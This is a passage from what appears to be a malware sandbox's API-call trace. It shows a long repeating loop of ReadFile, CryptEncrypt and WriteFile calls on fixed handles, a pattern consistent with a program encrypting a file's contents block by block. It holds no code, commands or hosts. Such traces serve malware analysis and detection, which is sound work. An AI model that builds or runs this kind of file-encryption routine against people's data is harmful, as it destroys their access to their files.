hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.233] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.234] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.234] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.234] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.234] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.234] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.234] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.234] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.234] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.234] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.234] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.234] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.234] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.234] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.234] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.234] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.234] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.235] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.235] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.235] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.235] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.235] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.235] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.235] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.235] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.235] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.235] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.236] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.236] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.236] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.236] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.236] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.236] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.236] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.236] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.236] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.236] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.237] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.237] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.237] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.237] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.237] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.237] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.238] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.238] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.238] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.238] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.238] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.238] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.238] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.238] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.238] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.238] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.239] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.239] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.239] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.240] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.240] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.240] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.240] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.240] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.240] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.240] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.240] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.240] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.240] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.241] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.241] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.241] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.241] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.241] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, 